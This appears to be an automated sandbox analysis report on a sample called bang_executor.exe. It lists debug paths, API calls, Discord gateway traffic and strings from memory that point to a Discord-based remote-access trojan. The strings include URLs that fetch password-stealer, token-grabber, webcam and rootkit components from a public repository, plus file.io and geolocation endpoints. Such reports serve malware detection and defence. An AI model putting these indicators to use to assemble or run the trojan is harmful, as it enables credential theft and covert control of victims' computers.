          Source: unknownHTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49751 version: TLS 1.2
          Source: bang_executor.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbg source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbC source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB4% source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbx source: WERB598.tmp.dmp.26.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb^ source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: b77a5c561934e089\mscorlib.pdb source: bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb" source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB@ source: bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Core.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Web.Extensions.pdbMZ source: WERB598.tmp.dmp.26.dr
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbE source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb*' source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Web.Extensions.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B4F000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.00000135261E8000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb& source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb&$ source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: bang_executor.PDB` source: bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDBpF source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Web.Extensions.pdb??\p= source: WERF485.tmp.dmp.34.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb\ source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbL source: bang_executor.exe, 0000001C.00000002.1780864823.000001352626C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: b77a5c561934e089\mscorlib.pdb, source: bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BB4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.000001352626C000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BB4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: bang_executor.exe
          Source: Binary string: C:\Windows\System.pdbpdbtem.pdb/ source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Xml.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb& source: bang_executor.exe, 0000001C.00000002.1780864823.00000135261E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb| source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb_ source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bang_executor.PDB@ source: bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: b77a5c561934e089\mscorlib.pdb>w0 source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Xml.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.pdb source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BA7000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.000001352625A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbj source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BB4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.000001352626C000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb8 source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B4F000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb3 source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb@k source: WERF485.tmp.dmp.34.dr
          Source: Binary string: bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb- source: bang_executor.exe, 0000001C.00000002.1780864823.00000135261E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: pC:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.pdb< source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbicy source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Web.Extensions.pdbpHp source: WERB52A.tmp.dmp.25.dr
          Source: Binary string: indoC:\Windows\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004EC4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_004EC4A8
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004FE560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_004FE560
          Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: JZZV0wLYGWIArUk7blYl6g==Sec-WebSocket-Version: 13Host: gateway.discord.gg
          Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: aYUnNI1T2trVUmXeoUmoSw==Sec-WebSocket-Version: 13Host: gateway.discord.gg
          Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: +ZQ8YwwGC+gtFcLWIAD8fQ==Sec-WebSocket-Version: 13Host: gateway.discord.gg
          Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: Du49Via+t800c0yCUOPmaQ==Sec-WebSocket-Version: 13Host: gateway.discord.gg
          Source: Joe Sandbox ViewIP Address: 162.159.136.234 162.159.136.234
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: JZZV0wLYGWIArUk7blYl6g==Sec-WebSocket-Version: 13Host: gateway.discord.gg
          Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: aYUnNI1T2trVUmXeoUmoSw==Sec-WebSocket-Version: 13Host: gateway.discord.gg
          Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: +ZQ8YwwGC+gtFcLWIAD8fQ==Sec-WebSocket-Version: 13Host: gateway.discord.gg
          Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: Du49Via+t800c0yCUOPmaQ==Sec-WebSocket-Version: 13Host: gateway.discord.gg
          Source: unknownDNS traffic detected: queries for: gateway.discord.gg
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 15 Feb 2024 17:14:52 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gf5S58277ctmcHDr2F3eKBmVHGRh%2BLXS1%2BE5PO504UiM7awvLASVT61pRN89tvvA5abcG1wv0UC2IymOWJ%2Bs5aFnRfJSS8JJgWD9pfhMdb5wyrGMDcBVUmm%2BnjEwsW%2FStr3G9Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 855f308f3b314315-EWR
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 15 Feb 2024 17:14:52 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TjEZVX6W2%2F7LeJAGd%2FLHKuQUR7qHPoRvppXrG4MiNbinv7vxjGwJjmW5N93qHkPsRtrsZ%2BbGo3xHovXoVizw0bo37XaVi2MVt7B4UBcb%2FQN%2BT0Yf4o9W7%2FRpalWvyPnalAKP8w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 855f3090ecdc43b6-EWR
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 15 Feb 2024 17:15:00 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DlNrVeh4%2FAHe4zGlXnfoRcTO0xUuNb1iwAP4JwQtjPUG0Nebl9oSCwBIWYcUWzOiPbKcfFg7M%2BqvkwDJULOKzJik0GCZUeEJRvlLa4D040Q14yzfKjcUUSZ95DPJnu4F0ghAzQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 855f30c13afb8c9c-EWR
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 15 Feb 2024 17:15:09 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VDjwJ6%2FAcpprXBh%2BLBImLVkoqsgddK96zslF6O1jFcimiwsKpVeEE8TqaM4KEo0SbP1wju1oGZwq8BYrx2mz8p6RTmpdNFzmFz7dtPpEa9KImtjalUpvIpBIF9s2vXERSFp0wg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 855f30f648580f7f-EWR
          Source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
          Source: bang_executor.exe, 0000001C.00000002.1780864823.000001352625A000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
          Source: bang_executor.exe, 00000003.00000002.1775906377.00000230000B5000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87F05000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D715000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gateway.discord.gg
          Source: bang_executor.exe, 00000003.00000002.1775906377.0000023000045000.00000004.00000800.00020000.00000000.sdmp, executer.exe, 00000004.00000002.1629460687.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6A5000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Amcache.hve.25.drString found in binary or memory: http://upx.sf.net
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.drString found in binary or memory: http://www.google.com/maps/place/
          Source: bang_executor.exe.0.drString found in binary or memory: https://discord.com/api/v9/channels/
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.drString found in binary or memory: https://discord.com/api/v9/guilds/
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.drString found in binary or memory: https://file.io/
          Source: bang_executor.exe, 00000003.00000002.1775906377.0000023000093000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87EE3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6F3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg
          Source: bang_executor.exe, 00000003.00000002.1775906377.0000023000093000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87EE3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6F3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg/?v=9&encording=json
          Source: bang_executor.exe, 00000003.00000002.1775906377.0000023000093000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87EE3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6F3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg/?v=9&encording=jsonX
          Source: bang_executor.exe, 00000003.00000002.1775906377.0000023000045000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6A5000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg:443/?v=9&encording=json
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.drString found in binary or memory: https://geolocation-db.com/json
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordSte
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20gra
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll
          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll
